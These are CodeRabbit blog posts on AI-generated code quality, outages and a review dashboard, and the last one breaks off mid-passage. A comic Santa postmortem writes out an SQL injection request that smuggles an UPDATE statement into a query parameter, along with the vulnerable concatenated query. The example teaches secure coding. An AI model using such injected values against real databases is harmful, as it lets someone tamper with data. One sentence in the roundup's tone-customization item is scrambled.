[Vibe Code Cleanup Specialist meme](https://www.linkedin.com/posts/deveshbhardwajj_ai-startups-engineering-activity-7373218403068788736-VXlT/). That generated conversations with CTOs and other senior engineering leaders about how they felt like their jobs had become, in large part, focused on cleaning up AI mistakes. These conversations showed a pretty widespread consensus across industries and companies: it was time for a return to quality code. AI had made coding faster, but it had not made correctness automatic. And without correctness, speed loses its value. ### **The economic reality set in** The final catalyst for the shift toward quality was financial. As more organizations embraced AI-first development, the downstream cost of defects became increasingly visible. Things like code reviews and testing took more time. Outages became more frequent, rollback rates increased, and teams were forced into unplanned refactoring cycles to correct issues introduced by generative tools. Executives and finance leaders started to quantify the impact: operational incidents, missed SLAs, reliability regressions, and customer churn all carry a price. The cost savings promised by AI-generated code began eroding as teams spent more time debugging and recovering from AI-introduced errors. Organizations started asking a different set of questions, not “how much code can AI produce?” but “what is the true cost of code that hasn’t been properly validated?” ## **2026: The year of quality** Organizations are entering 2026 with a different set of priorities. Speed is no longer the only metric that separates high-performing teams from struggling ones; quality has become the true competitive differentiator. Engineering leaders are beginning to shift their KPIs away from raw throughput and toward indicators of correctness and maintainability. Defect density, review load, merge confidence scores, test coverage, and long-term maintainability metrics are likely to replace cycle time as the numbers that matter most this year. Teams are starting to optimize, not for how quickly code could be generated, but for how reliably it could be trusted. In this new environment, “correct code” will become the new definition of productivity. ## **Predictions: What 2026 will look like & how to adapt** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/05664ed42e823764eb7061cb83722ffd93a53b5f29d8a4d44b93d90034fec42a_8c4113e0c6.png) The shift toward quality will reshape how engineering teams operate, evaluate tools, and measure success. By the end of 2026, several trends will become unmistakably clear. ### Shift 1: Companies will track different AI-related metrics First, companies will begin formally tracking AI-related defect metrics. Instead of treating AI-generated bugs as anecdotal, organizations will measure them with the same rigor used for security incidents or system reliability. Metrics such as AI-attributed regression rates, incident severity linked to AI-generated changes, and review confidence scores will become standard engineering dashboards. ### Shift 2: Third party tools will be used to validate AI-code Second, organizations will adopt more third-party tools designed specifically to validate their coding agents and protect production systems. These tools will act as independent safeguards, offering objective assessments of code quality and catching issues that the generating agent cannot reliably detect since they introduced them in the first place. Enterprises will increasingly view external third party tools for validation as essential risk mitigation rather than optional tooling. ### Shift 3: Multi-agent workflows will be used to validate code Multi-agent workflows will normalize continuous review and validation. Instead of a single agent generating code and hoping for correctness, multi-agent systems will create a layered workflow: one agent writes, another critiques, another tests, and another validates compliance or architectural alignment. These chains will reduce the cognitive burden on developers and raise the certainty that the code entering production is safe, stable, and coherent. ### Shift 4: Companies will develop governance around ***how*** to use AI As quality becomes the defining engineering priority, teams start building structured governance around how AI is used. Organizations introduce explicit policies on acceptable AI usage, documentation requirements, and review expectations. Taken together, these shifts will signal a broader evolution: AI development is moving from experimentation to discipline, from speed to stability, and from novelty to operational maturity. ## **Conclusion: AI use will *finally* grow up this year** The story of 2025 was a story of speed. But it also revealed a harder truth: when speed is easy, quality is the real challenge. In the coming year, the industry will grow up when it comes to their AI use. Engineering organizations that thrive will be the ones that design workflows around reliability, maintainability, and architectural clarity. They will be the companies that treat AI not as a shortcut, but as a system that demands robust validation, thoughtful oversight, and careful integration into existing processes. The next wave of AI innovation will not be defined by how fast we can generate code. It will be defined by how confidently we can ship it. The future belongs to teams that prioritize correctness, trustworthiness, and long-term stability. ***Make your reviews easier in 2026 and catch more defects.*** [***Try CodeRabbit today for free!***](https://coderabbit.link/IN5Gacu)

North Pole incident report: Why Santa now uses AI code reviews

Emily Lint — Sun, 21 Dec 2025 00:00:00 GMT

*Confidential Postmortem — NP-SEV1-1224* *Classification: TINSEL RED (Top-Secret, Festive)* ## **Executive summary** On December 24, 2024 at 03:14 UTC-Pole, the North Pole Production Environment experienced a critical security breach in the Gift Distribution Pipeline (GDP). A clever 11-year-old named Milo R. from Wisconsin exploited an injection vulnerability in the **ElfOps Gift-Sorting API**, temporarily modifying his gift allocation balance from **2 gifts** to **47,382 gifts**. Santa discovered the anomaly after noticing a suspicious spike in the global Nice Score ledger: specifically, one child labeled as *“Nice Infinity”* with the comment: "I deserve it." Root cause analysis indicates the elves accidentally introduced an SQL injection vulnerability while rewriting the gift sorter to “make it more responsive” and “work better on sleigh Wi-Fi.” This incident accelerated Santa’s adoption of AI-powered code reviews. ## **Incident timeline** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f7beec1b9ee0a0897da6466911b121ebc527900f9386d1c90fab456cd32e4e16_690da77298.png) **02:59 – 03:01 UTC-Pole** * Elves deploy version *gift-sorter-v6-final-FINAL.js* to production. No code review performed because “the sprint was behind” and “everyone wanted cocoa.” **03:14 UTC-Pole** * Milo discovers the undocumented /gift?list= endpoint and sends the following request: /gift?list=nice; UPDATE gifts SET amount = 47382 WHERE kid = 'Milo'; The API happily executes this. **03:15 UTC-Pole** * Gift totals balloon. North Pole monitoring dashboard shows a red banner reading: **“CRITICAL: INVENTORY DOWN 99.4%”** **03:20 UTC-Pole** * Rudolph receives Milo’s new gift manifest, loads gifts, and physically collapses under the load. **03:25 UTC-Pole** * Santa initiates SleighSafe Mode and calls an emergency stand-up. Candy canes are dropped. Tinsel is stepped on. Morale is low. **03:40 UTC-Pole** * Root cause identified: a line in the API reading: const query = "SELECT \* FROM gifts WHERE kid = '" + kidName + "'"; When asked why they wrote it this way, the junior elf engineer squeaked: “I copied it from Stack Overflow.” ## **Root cause** * **Lack of code review culture:** Elves prefer “move fast and break toys” as an engineering philosophy. * **Outdated testing practices:** QA elves only test with *well-behaved children*, skewing coverage. * **Lax security protocols:** Santa’s database password was literally "hohoho123." * **No automated reviewers:** Santa was doing all PR reviews personally and had fallen 2,814 PRs behind. ## **Impact** * Global gift distribution system became unavailable for 21 minutes. * Santa’s sleigh ETA increased to 15–18 hours (AKA “Amazon Prime territory,” which was “unacceptable”). * Workshop morale plummeted. * Milo nearly became a one-child Black Friday-level incident. ## **Why Santa adopted AI code reviews** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/98ecf225accc60b16fe31b572adbb281e5861de379385eda5b3cbb7410568081_9ae5635725.png) After the incident, Santa introduced CodeRabbit’s AI-powered, 24/7 code review for every workshop repository. ### Benefits achieved: 1. **No more injection vulnerabilities** CodeRabbit immediately flagged the elves’ SQL string concatenation with warnings like: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1ea59ac9a1865a88773ccfedfe1356440f9c2f10ad2c22912f1d29969896eec5_0391412f28.png) 2. **Reduced Santa’s PR backlog from 2,814 to 0** Santa can now focus on his actual job (eating cookies). 3. **Banned changes originating from “My First Hacking Kit™”** The kid’s exploit came with a README titled: *“How to pwn Santa (ethical???)”* CodeRabbit commented: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4559f458a61102171a1b202c40065722b3d3db7845e82328311bd9cf14e55310_ea87869037.png) 4. **Banned the overuse of festive ASCII art.** No one wants to read a PR with 6,000 lines of code, even if 5,900 are ASCII Christmas trees. CodeRabbit commented: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/93e29d594352ea631f2b4eaa3443e88048a00e0c8214a29ea97b4b439b331534_bd3f88ed46.jpg) 5. **Caught an array of gift types off by one index** Gifts almost shifted by one position: * Teddy bears would become toasters * Trains would become taxidermy kits * Candy canes would become crowbars CodeRabbit commented: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/121460d2bbd40e9d8613df0d75762b1a113cbf32919a0a1482cd4b42a709eb3e_a19a849539.png) ## **Corrective actions** * Require **AI reviews** on all PRs. * Implement secure coding guidelines (“No SQL injection, even if it's funny”). * Mandatory training for elves on the difference between: * *Production code* * *Joke PRs written after drinking too much eggnog* * Rotate Santa’s database password more frequently than “once every 600 years.” ## **Closing Notes from Santa** “We learned many lessons this holiday season, but the biggest one is simple: **No code ships without a proper review, whether by elf or AI.** Also, please stop giving the reindeer admin access.” ***If it’s good enough for Santa, it’s good enough for your team. Try*** [***CodeRabbit for free, today!***](https://coderabbit.link/Z4JBglo)

Our 10 best posts of the year: A 2025 CodeRabbit blog roundup

Manpreet Kaur — Thu, 18 Dec 2025 00:00:00 GMT

This year, we dove deep into all kinds of topics, from the philosophical shift toward “Slow AI” to the practical realities of building with increasingly sophisticated LLM models to why you shouldn’t trust threads with 🚀on vibe coding for code you intend to ship to prod. **Here’s a look back at our most impactful posts from the past year in case you missed them:** ## 1\. [**The end of one-size-fits-all prompts: Why LLM models are no longer interchangeable**](https://www.coderabbit.ai/blog/the-end-of-one-sized-fits-all-prompts-why-llm-models-are-no-longer-interchangeable) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e1de7d0b254a09cd36eb675be6dd56a374e76feb1500d4a4e87db7e02a057d3c_dbbb964513.png) For years, developers could swap LLM models like interchangeable parts but now those days are over. This piece explores how modern AI models have separated in fundamental ways, from reasoning approaches to output formats, making LLM choice a critical product decision rather than a simple configuration change. We break down what this means for developers and why the “one prompt fits all” era is now over. ## 2\. [**The rise of 'Slow AI': Why devs should stop speedrunning stupid**](https://www.coderabbit.ai/blog/the-rise-of-slow-ai-why-devs-should-stop-speedrunning-stupid) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f4a7c5a1109f36da744ecfc4991df186de23a9869fab7ff389b97d976490fb14_ad0462d00a.png) Fast isn’t always the way to go. While AI coding tools promise lightning-speed development, this article makes the case for slowing down. We explore why AI tools that take time to reason through problems produce better, more maintainable code than those optimized purely for speed. Drawing on data from a number of studies, we examine the paradox of developer confidence versus actual trust in AI-generated code and why “Slow AI” might be an antidote to technical debt. ## 3\. [**AI code metrics: What percentage of your code should be AI-generated?**](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bd86ae1d8c70b54d0b8d8384f125730639cdea97a21a9048f2454b9997368538_7fafe97904.png) The title is clickbait (we admit it), but the question remains: how do you measure the impact of AI on your codebase? This post challenges the notion that “percentage of AI-generated code” is a meaningful metric. Instead, we explore what engineering teams should *actually* measure when evaluating AI’s role in their development process, and why focusing on the wrong metrics can lead to dangerous blind spots in code quality. ## 4\. [**Handling ballooning context in the MCP era: Context engineering on steroids**](https://www.coderabbit.ai/blog/handling-ballooning-context-in-the-mcp-era-context-engineering-on-steroids) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d028f99c5a25c8fc390fb51e215836cd77fc5e0c2335ceb93fdd64752c638898_ee0cc65ab7.png) The Model Context Protocol (MCP) promised easy integration between LLMs and external tools. But in reality, it created a context overload problem. This article tackles the issue of ballooning context windows and how to engineer your way out of them. We explore why MCP’s elegance can become a liability without deliberate context engineering and share strategies for keeping your AI tools sharp and focused rather than drawing in a black hole of data. ## 5\. [**2025: The year of the AI dev tool tech stack**](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2febd27812e86246f82f075e59f682f7ae8d72c06665b7692ec26d9787b1a55b_15a896ebab.png) When Microsoft and Google both announced that AI generates 30% of their code, it became clear: we’re not talking about single tools anymore, we're talking about stacks. This post explores the emerging ecosystem of layered AI dev tools across the software development lifecycle. From foundational coding assistants to essential code review layers, we map out what a modern AI dev tool stack looks like and share sample configurations teams are using. ## 6\. [**Why emojis suck for reinforcement learning**](https://www.coderabbit.ai/blog/why-emojis-suck-for-reinforcement-learning) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0e1a4b06ed9f74f1d2795991a211183120fcebf8e18a215ff88c574e77ff9c73_7f82b89b68.png) **👍**feels good, but is it teaching your AI reviewer anything? This article explores why emoji-based feedback, while universal, falls short at improving AI performance over time. We break down the simplicity trap and explain which nuanced feedback works to build better AI code reviews. Spoiler: it’s not as simple as a thumbs up or thumbs down. ## 7\. [**Vibe coding: Because who doesn't love surprise technical debt!?**](https://www.coderabbit.ai/blog/vibe-coding-because-who-doesnt-love-surprise-technical-debt) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/60cfc997f2a22e6681252771df841c81ffe33860a825f46ce84a8f6e195e402c_42780e448a.png) “Vibe coding,” the practice of prompting AI tools with vibes and hoping for the best is everywhere. And it’s creating technical debt at an unprecedented scale. What happens when developers rely heavily on AI assistants like Claude Code, ChatGPT, and GitHub Copilot without proper processes in place? We dive into the hidden costs of moving fast and breaking things when your entire codebase depends on it. ## 8\. [**Good code review advice doesn't come from threads with 🚀 in them**](https://www.coderabbit.ai/blog/good-code-review-advice-doesnt-come-from-threads-with-in-them) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4d5d265aa20b3ec24b64421034cad744e481e39304632962d2542f6b685b2a84_64821279a4.png) Twitter threads promising “10 vibe coding and review tips every dev should know” are everywhere. But here’s the truth: practical code review advice requires full context, nuance, and experience. This blog questions the idea that code review wisdom is distilled into a tweet, from fresh eyes to AI-assisted review layers that understand your specific context. ## 9\. [**CodeRabbit's Tone Customizations: Why it will be your favorite feature**](https://www.coderabbit.ai/blog/tone-customizations-roast-your-code) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b5aaf8e48a87fa43e42291fcc179915cb6712bfb86e8fc63b38b7014ce0fcd65_689776317a.png) Ever wish your code reviewer could channel Gordon Ramsay? Or maybe your disappointed mom? We talk about CodeRabbit’s tone customization feature, which lets you adjust how your AI code reviewer communicates, from encouraging and gentle to bgenerated code), share setup instructions, and celebrate the creative ways developers are cusrutally honest. We dive into why tone matters in code review (especially when dealing with AI-tomizing their review experience. ## 10\. [**CodeRabbit commits $1 million to open source**](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d64953dd3af234f36927ec7a06fcc505d1385e966517395af09615bbe93ba46b_0088023573.png) Open source is the foundation of modern software development, from package managers to frameworks to the infrastructure we all depend on. This post announced CodeRabbit’s $1 million USD commitment to open-source software sponsorships, reflecting our gratitude for what open source enables and our ongoing support for the developers and projects that power the ecosystem we all build on. ## The bottom line: Our blog rocks, you should read it weekly in 2026 Each of these blogs represents a piece of the larger conversation about how AI is reshaping software development. We hope these insights will help you ship better code, refine your AI development setup, tackle context engineering challenges, or simply avoid technical debt from "vibe-coding." ***Try out CodeRabbit today with a*** [***14-day free trial.***](https://coderabbit.link/ecCaLNJ)

Why 2025 was the year the internet kept breaking: Studies show incidents are increasing

Aravind Putrevu — Thu, 18 Dec 2025 00:00:00 GMT

## **Rising outages: What the data tells us** In October, the founder of [www.IsDown.app](http://www.isdown.app) went on Reddit to share [some disturbing charts](https://www.reddit.com/r/sysadmin/comments/1o15s25/comment/niefml8/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button). His website, an authoritative source on whether a website is down or not, has been tracking outages since 2022. And he had a frightening statistic: there are a lot more outages in 2025 than there have been in past years. And the number of outages has been increasing since 2022. In his [posts](https://www.reddit.com/r/sysadmin/comments/1o15s25/comment/niefml8/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button), he talked through things that might be causing this trend. AI code came up repeatedly, though some contributors also suggested it could be caused by offshoring or laying too many developers off. What’s clear is that bugs got through more frequently in 2025 than in past years and that’s leading to expensive downtime for all involved. His site’s data tracks with what multiple studies and surveys are finding: * A [survey of over 1,000 CIOs](https://www.digi.com/company/press-releases/2025/businesses-report-rising-network-outages?utm_source=chatgpt.com), CSOs and network engineers across multiple countries found that 84% of businesses reported rising network outages over recent years and more than half of them saw a 10-24% increase over a two-year timeframe. * The [ThousandEyes blog](https://www.thousandeyes.com/blog/internet-report-outage-patterns-in-2025?utm_source=chatgpt.com) reported global outage counts increasing from 1,382 in January 2025, to 1,595 in February (+15 %), to 2,110 in March (+32 %) before tailing off somewhat to 1,843 in May, a volatile pattern of upward pressure. So, what’s really causing this spike in outages and what can we do about it as developers? ## A billion dollar outage… and companies looking for a solution When the mighty fall, they take a lot of other companies with them. When AWS went down earlier this year, websites froze. Payments were declined. Even worse, Fortnite games were interrupted. In the aftermath of the outage, people have tried to estimate just how much economic activity evaporated with the functionality of US-EAST-1. Amazon once claimed that even a [few milliseconds difference in latency](https://www.gigaspaces.com/blog/amazon-found-every-100ms-of-latency-cost-them-1-in-sales) would cost them tens of millions of dollars. So, what did a multi-hour outage do for the online retailer and all the companies it hosts? [Forbes estimates that billions were lost](https://www.forbes.com/sites/christerholloman/2025/10/20/aws-outage-billions-lost-multi-cloud-is-wall-streets-solution/) with one CEO it quoted suggesting that losses could even reach into the hundreds of billions. Multi-cloud quickly emerged as the [new/old buzzword](https://www.itbrew.com/stories/2025/10/22/why-the-aws-outage-has-some-questioning-the-internet-s-codependence-on-hyperscalers) and companies are grappling with how to manage the risk of relying too heavily on one database provider. But even if you migrate to a multi-cloud environment, your payment processor might still be on the receiving end of an outage and put a spanner in your revenue just the same. Or your operations might be taken down by a bug of your own. A far better fix would be for us to figure out as an industry how to reverse the trend line that’s seeing downtime and incidents steadily increasing. Because something is causing those increased incidents and it’s *entirely in our power* as an industry to reverse that trend. ## How AI, code quality & bugs fit into the picture ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a0dc33ad85ce30f72909ba25e4938dd5b90962a473fa21965d26556cc1943ce7_47d3839ff6.png) So, what’s contributing to these trends? It’s likely what everyone immediately thinks about when they hear incidents are increasing: the problem is AI-generated code. That’s because we’ve all found, by this point, a veritable motherload of bugs in AI-generated code that we’re certain a human engineer wouldn’t have introduced on their own. And this isn’t just anecdotal. The data overwhelmingly supports it too: * Our recent [State of AI vs. Human Code Generation Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report?) found that AI code has 1.7x more issues and bugs in it. And what’s more, it found an increased number of issues and bugs in areas that could lead to incidents like Logic and Correctness issues (this category had the largest number of issues) and security issues (1.5x to 2x higher). * A large-scale academic study titled [*“Human-Written vs. AI-Generated Code: A Large-Scale Study of Defects, Vulnerabilities and Complexity”*](https://arxiv.org/abs/2508.21634?utm_source=chatgpt.com) (Aug 2025) compared over half a million Python and Java samples written by humans vs. by LLMs. The findings: AI-generated code tends to include more high-risk vulnerabilities. ## What this means for outages and incidents ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c40f00dc54efc26c7d731a876e9211ed3e79ad8a1703a4b5816af8a3b8d7da77_fc5ba9d2a3.png) Pulling this together, the data clearly shows overall incident and outage frequency is trending upward. As teams lean more heavily on AI-generated or AI-augmented code, they are exposing themselves to new classes of risk: more latent vulnerabilities, reduced visibility of what’s been generated, and more pressure on existing QA/test/review workflows that may not have been enhanced to compensate for the speed of code generation and deployment. In short, the combination of faster delivery, heavier reliance on AI, plus less-mature processes in many teams = a higher probability that “something will go wrong.” ## The call is coming from inside the house: We should stop treating outages as anomalies As the data clearly shows, the problem is structural but, as developers, we are conditioned to see each incident as a separate event. Here’s the problem with that approach though: if you treat every outage as a one-off event that happened to some other team, you’ll miss the broader pattern. Change failure rates, environment complexity, and toolchain fragility are all increasing. When you overlay the growing use of AI-generated code, the risk footprint changes. The root of reliability increasingly rests not just on infrastructure, but on how we build, review, test, deploy and operate software, and how we integrate AI into that chain without weakening it. What a big outage like AWS’ camouflages is that the issue isn’t just third party providers, the call is also coming from inside the house. And inside all the houses of all the companies that power your stack. ## What to do about it as an industry (Spoiler: This is not a pitch) This is where a company would typically make their pitch about how, if only AWS had used their product, the outage would never have happened. Billions would not have been lost and everyone would have continued on their day like it was an ordinary Monday. But here’s why it won’t help anyone for us to focus on that: you can’t fix a massive structural problem with a new tool alone. And this is indeed a structural problem. In July, we wrote about what we saw as a worrying trend. Companies were starting to make claims about what [percentage of their code was AI-generated](https://www.coderabbit.ai/blog/ai-code-metrics-what-percentage-of-your-code-should-be-ai-generated) as though that was a valuable metric to measure. Google and Microsoft both claimed that 30% of their new code was being generated by AI. At the time, we wrote: “A metric based purely on volume… doesn’t tell you how much developer time was needed to debug or review the AI-generated code. Without these nuances, a 30% metric means almost nothing about actual efficiency or quality outcomes.” Our suggestion then was that companies shift focus from this approach that sees all code generated by AI as a good thing and look at AI usage and adoption more holistically including by relying on metrics that: * Are developed in collaboration with engineers who understand day-to-day workflows. * Align with real productivity and business outcomes, not superficial adoption targets. * Encourage flexible, context-aware experimentation rather than rigid enforcement. That could be things like holistic metrics that look at how much time developers spend coding with AI versus how much time they spend debugging or it could be as simple as tracking how many incidents you have and their severity and costs as you increase use of AI on your team. These rules are more likely to lead to holistic metrics that look at both the productivity benefit in increased code generation speed but its downsides so companies can better understand the full impact and ROI of AI usage. ## Ways to de-risk AI adoption So, what does that mean for AI usage? Most teams have now integrated them into their workflows in ways that benefit them. And the problem might not be AI coding tools themselves but HOW some companies have chosen to adopt them. Many teams are being told they need to use AI to write more code with a goal of increased productivity and then they’re just handed a tool and nothing more. That’s an adoption process designed to make incidents skyrocket. Here are some common sense ways we all need to start thinking about AI coding tool adoption: 1. ### Properly resource review and QA teams When AI coding tools are advertised as ways to reduce developer time (and developers) it’s not surprising decision makers make the mistake of thinking they can cut teams now that AI is helping. But that doesn’t address the downstream effects of AI generated code. One of the most overlooked consequences of adopting AI-assisted coding tools is the sheer increase in code volume they create. Developers can now spin up entire modules in minutes. That speed feels like productivity, but it also means that review and QA pipelines are being overwhelmed. When the number of pull requests doubles but the number of reviewers stays the same, even the best processes begin to fray. To de-risk AI development at scale, organizations need to staff and support review, QA, and testing functions proportionally to the new pace of code generation. That could include AI tools that help with the review and QA work. 2. ### Know what to look for Until recently, we knew that AI introduced more bugs and issues but we didn’t know what kinds of bugs and issues it introduced most often. Now, with our [State of AI vs. Human Code Generation Report,](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) we have those answers. AI, for example, is 2.25x more likely to create algorithmic and business logic errors and 2.29x more likely to have incorrect concurrency control issues. Things like misconfiguration, error and exception handling, and incorrect dependencies are nearly 2x more prevalent as well. Our report is helpful for creating a checklist of what to double check relevant PRs for to make sure fewer of these bugs slip through. . 3. ### Shift testing and reviews left AI-assisted code introduces a new kind of complexity: it often *looks* correct, compiles cleanly, and passes superficial checks but hides subtle logical or edge-case errors that only surface under specific conditions. To mitigate this, organizations need to shift testing and reviews as far upstream as possible. Rather than treating QA as a final gate, testing must become a living part of the development loop itself. This means integrating automated unit, integration, and property-based testing directly into the AI generation workflow, sometimes referred to as *continuous verification*. Every code suggestion from an AI assistant should trigger lightweight checks before it even reaches a human reviewer. You can also conduct reviews in your IDE or CLI environments to catch bugs and potential issues before creating a pull request. Then, AI-generated pull requests should be automatically flagged and routed through more rigorous review protocols, including additional static analysis, dependency scanning, and peer oversight. Reviewers should know when a piece of code was generated versus hand-written, not as a stigma, but as a signal that it may need a deeper pass. Some companies are already labeling AI-authored commits or requiring an “AI provenance” tag in the PR description. Other companies are also forbidding the use of AI to write certain kinds of code that are critical for security. 4. ### Expand chaos and resilience testing Traditional testing assumes predictable behavior but AI-assisted systems are increasingly unpredictable. Code generated by large language models can fail in non-obvious ways: mishandling unexpected inputs, producing inconsistent API calls, or creating hidden performance bottlenecks that only reveal themselves under load. That’s why many engineering teams are expanding chaos and resilience testing beyond infrastructure to encompass the *application layer* itself. By running failure-injection experiments in staging environments such as intentionally breaking components, throttling dependencies, or introducing malformed data, teams can observe how AI-generated logic behaves under stress. These simulations expose weak assumptions baked into AI-generated code that standard test suites often miss. Pairing chaos testing with automated rollback mechanisms, canary deployments, and progressive delivery ensures that when things do go wrong, the blast radius is small and recoverable. 5. ### **Integrate AI literacy and secure-coding training** Don’t assume developers instinctively know how to use AI safely. The tools may feel intuitive (type a prompt, get working code) but beneath that simplicity lies a set of entirely new failure modes that most engineers were never trained to anticipate. That means providing regular, hands-on training on topics like prompt design, model limitations, and the systemic ways AI-generated code can go wrong. Developers should learn to spot signs of hallucinated functions (calls to APIs that don’t exist), insecure defaults (improper authentication or data handling), and non-deterministic behavior that can make debugging far more complex. They should also understand what the model *doesn’t know*, including its knowledge cutoff, its lack of situational awareness, and its tendency to optimize for plausibility rather than truth. A team that understands how generative tools fail is far less likely to trust them blindly… and far more likely to catch issues before they end up in production. ## We can turn this around in 2026 (yes, there’s hope) The lesson of 2025’s rising incident curve is clear: you can’t automate your way out of accountability. If AI is going to write more code, humans need the time, tools, and headcount to review more code. Otherwise, every efficiency gain on the input side becomes a liability on the output side. Which is something we’re currently seeing writ large as an industry. The goal shouldn’t just be to adopt AI but to adopt it in ways that *actually* help companies. What we’re seeing now in the increased level of incidents is *false velocity*: the illusion of progress that hides compounding defects. But that illusion can be corrected. Teams that invest in thoughtful testing, resilient review processes, and a culture of ownership can still realize AI’s potential without paying the price in downtime. And the more teams that do that, the less downtime and incidents we’ll see industry-wide. ***Curious how CodeRabbit could help? Read our*** [***case study on how we helped Clerk***](https://www.coderabbit.ai/case-studies/inside-clerks-40-percent-faster-merge-workflow-with-coderabbit) ***or*** [***try our AI reviews***](https://coderabbit.link/tig9AVb) ***today.***

Measuring what matters in the age of AI-assisted development

Sahana Vijaya Prasad — Thu, 18 Dec 2025 00:00:00 GMT

Every engineering leader I talk to is asking the same question: "Is AI actually making us better?" Not "are we using AI" (everyone is). Not "is AI generating code" (it clearly is). And not even, “What percentage of our code is AI generating?” (unless you’re Google or Microsoft and announce this publicly). The real question is whether AI adoption is translating into shipping faster, better quality code and making for more productive and happier engineering teams. The problem is that most tooling gives you vanity metrics. Lines of code generated. Number of AI completions accepted. These tell you nothing about what happens *after* the AI writes code. Does it survive review? Does it ship? Does it break production? CodeRabbit sits at a unique vantage point in the development lifecycle. We review both human-written and AI-generated code. We see what gets flagged, what gets accepted, and what makes it to merge. We watch how teams iterate, how reviewers respond, and where friction accumulates. We’ve been able to see all those things and knew there was value to that for teams, as well. So, today, we are releasing a new analytics dashboard that puts this visibility directly into the hands of engineering leaders. ## The 3 questions every engineering leader asks When teams adopt AI tooling, three questions dominate every conversation with directors, VPs, and platform leads: **1\. Is our review process faster or slower?** AI-generated code often produces more PRs, larger diffs, and different kinds of issues. If your review process cannot keep up, you have not gained velocity. You have created a bottleneck. **2\. Is code quality improving or degrading?** More code is not better code. The question is whether AI-assisted development is catching bugs earlier, reducing security issues, and maintaining the standards your team has set. **3\. How do we prove ROI to the business?** Engineering leaders need to justify tooling spend. Saying "developers like it" is not sufficient. You need numbers that connect to business outcomes: time saved, defects prevented, throughput gained. The CodeRabbit Dashboard answers all three. ### What CodeRabbit’s Dashboard shows %[https://youtu.be/3ytbvTjG8ic] The dashboard is organized into five views, each designed to answer a different class of question. Let me walk through what engineering leaders care about most in each section. ## Summary: The Executive View ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d0a5689d72720045b329153719c59be50ebb16004ae7786935e941ffbea4db16_6cf155d097.jpg) The Summary tab gives you the numbers that matter for a leadership update. In the screenshot above, you can see the core metrics at a glance: In the screenshot there were 145 merged PRs from 86 active users over the selected period. This is your throughput baseline. **Median Time to Last Commit:** This measures how long it takes developers to finalize their changes after a PR becomes ready for review. Short times indicate tight feedback loops and clear reviewer expectations. Spikes here often signal bottlenecks. **Reviewer Time Saved:** This metric answers the ROI question. CodeRabbit models the effort of a senior reviewer and estimates how much human review time the AI has offset. For budget conversations, this number translates directly into saved engineering hours. **CodeRabbit Review Comments:** A low acceptance rate would indicate noise. A high rate indicates trusted, actionable feedback. Acceptance rate is the quality signal. If reviewers and authors are acting on CodeRabbit feedback at least half the time, the tool is surfacing relevant issues. The donut charts break down comments by severity (Critical, Major, Minor) and category (Functional Correctness, Maintainability, Security, Data Integrity, Stability). This tells you what *kinds* of problems CodeRabbit is catching. If most comments are Minor/Maintainability, that is a different story than Critical/Security. **Average Review Iterations per PR:** Always know how many cycles a typical PR goes through before merge. High iteration counts can indicate unclear requirements, poor PR quality, or overloaded reviewers. Tracking this over time shows whether your process is tightening or loosening. **Tool Findings:** CodeRabbit surfaces findings from your existing static analysis tools. This consolidates your quality signals into one view. ## Quality Metrics: Where Are the Real Problems? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/83f75463023e22d824b993a74a2ec8dc9ac778785bb26afca8f8efa28dc51f02_60b50f5e19.jpg) The Quality Metrics tab answers: "Is CodeRabbit catching the right things?" **Acceptance Rate by Severity:** How often developers act on CodeRabbit comments at each severity level? Consistent acceptance across severity levels suggests CodeRabbit is calibrated well to your team's standards. **Acceptance Rate by Category**: This breaks it down further: * Data Integrity and Integration * Functional Correctness * Maintainability and Code Quality * Security and Privacy * Stability and Availability These numbers help you understand where CodeRabbit adds the most value. If Security acceptance is low, it might indicate false positives in that category. If Maintainability acceptance is high, developers trust CodeRabbit for code quality guidance. **Bar charts:** These show raw counts. How many comments were posted versus accepted in each category. This gives you more info about what kinds of comments you’re finding. **Tool Findings:** This breakdown shows which static analysis tools contributed findings so you’re aware which are providing more findings for your codebase. ## Time Metrics: Where does work get stuck? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c305d59de096ef8b8bfbedc6457e9ee0377a35dee7204bd2b1b641b6ac3365db_13cbd7f8f2.jpg) The Time Metrics tab tracks velocity through the review process. This is the data you need to find bottlenecks so you can fix them. **Time to Merge:** We measure the full duration from review-ready to merged, these include looking at various metrics including these figures as shown in the above example: * Average: 1.2 days * Median: 1.4 hours * P75: 14 hours * P90: 4 days The gap between median and P90 is revealing in the example. Most PRs merge in 1.4 hours, but the slowest 10% take nearly 4 days. That tail is worth investigating. **Time to Last Commit:** This focuses on how long it takes developers to complete their final changes. Here’s the data in the above example: * Average: 2.4 days * Median: 4.5 hours * P75: 2 hours * P90: 5 days Compare this to Time to Merge. If the last commit happens quickly but merge takes much longer, PRs are sitting idle after code is done. That delay often comes from approval bottlenecks, release gates, or unclear ownership. **Time to First Human Review:** How long do PRs wait before a human looks at them? Here’s the example in the screenshot: * Average: 3.4 days * Median: 1.9 hours * P75: 3 hours * P90: 2 days The median here is under 2 hours, but the average is dragged up by outliers. The weekly trend 